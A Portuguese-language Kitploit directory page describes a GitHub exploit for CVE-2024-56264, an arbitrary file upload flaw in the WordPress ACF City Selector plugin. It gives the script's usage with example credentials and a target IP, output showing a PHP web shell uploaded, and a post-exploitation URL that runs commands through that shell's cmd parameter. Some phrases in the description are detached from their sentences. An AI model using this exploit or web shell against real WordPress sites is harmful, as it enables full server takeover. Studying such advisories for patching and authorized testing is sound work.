Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2024-56264
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2024-56264

CVE-2024-56264

Plugin ACF City Selector do WordPress <= 1.14.0 - Vulnerabilidade de upload arbitrário de arquivos

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-56264

WordPress ACF City Selector - Exploit de Upload Arbitrário de Arquivo (CVE-2024-56264)

Visão Geral

Este repositório contém um exploit para CVE-2024-56264, que é uma vulnerabilidade de Upload Arbitrário de Arquivo encontrada no plugin ACF City Selector do WordPress (versões <= 1.14.0). Esta vulnerabilidade permite que um atacante faça upload de um arquivo PHP malicioso (web shell) para uma instância vulnerável do WordPress e execute comandos arbitrários no servidor.

Detalhes do CVE

  • CVE ID: CVE-2024-56264
  • Data de Publicação: 2 de janeiro de 2025
  • Plugin Afetado: ACF City Selector
  • Versões Vulneráveis: <= 1.14.0
  • Impacto: Execução Remota de Código (RCE) via upload de arquivo irrestrito

Descrição

O plugin ACF City Selector não valida adequadamente os arquivos enviados, permitindo que atacantes e façam upload de . Uma vez que um arquivo PHP malicioso é enviado, um atacante pode executar comandos do sistema remotamente, levando ao .

burlem as restrições
arquivos PHP arbitrários
comprometimento total do servidor

Requisitos

📌 Dependências

Certifique-se de que os seguintes itens estão instalados antes de executar o script:

  • Python 3.x
  • módulo requests (Instale usando: pip install requests)

Você pode instalar todas as dependências necessárias usando:

root@kitploit:~
pip install -r requirements.txt

🚀 Uso

Executando o exploit:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           exibe esta mensagem de ajuda e sai
  --url URL            URL base do site (ex.: http://192.168.100.74/wordpress)
  --username USERNAME  nome de usuário do WordPress
  --password PASSWORD  senha do WordPress

Exemplo:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Saída Esperada

Após a exploração bem-sucedida, você deve ver:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Pós-Exploração

Se bem-sucedido, acesse o shell enviado via:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Isso permite a execução remota de comandos no servidor.

⚠ Aviso Legal

Este script é destinado apenas para fins educacionais e de teste de segurança autorizados. O uso não autorizado é ilegal e pode resultar em consequências graves. O autor não se responsabiliza por qualquer uso indevido deste exploit.

Baixar ferramenta